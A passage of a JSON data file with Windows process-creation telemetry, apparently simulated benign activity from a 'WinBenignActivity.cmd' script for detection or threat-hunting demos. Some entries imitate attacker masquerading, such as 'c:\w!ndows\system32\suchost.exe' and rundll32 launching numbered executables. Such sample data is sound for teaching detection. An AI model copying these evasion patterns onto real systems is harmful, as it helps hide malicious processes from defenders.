c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 10 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 10 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 13 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 22 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\15930\\\\31294.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 20 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358...\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"rundll32 \\\\24611\\\\27906.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 6 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 11 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 26 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 18 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /...\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\10012\\\\26584.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 21 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 30 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\26132\\\\13555.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 18 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958...\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"rundll32 \\\\21814\\\\15398.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 20 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 23 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 21 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /3...\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"ping 127.0.0.1 -n 25 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 14 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 5 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\3567\\\\28584.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 15 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563...\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"rundll32 \\\\17279\\\\3548.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 9 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files 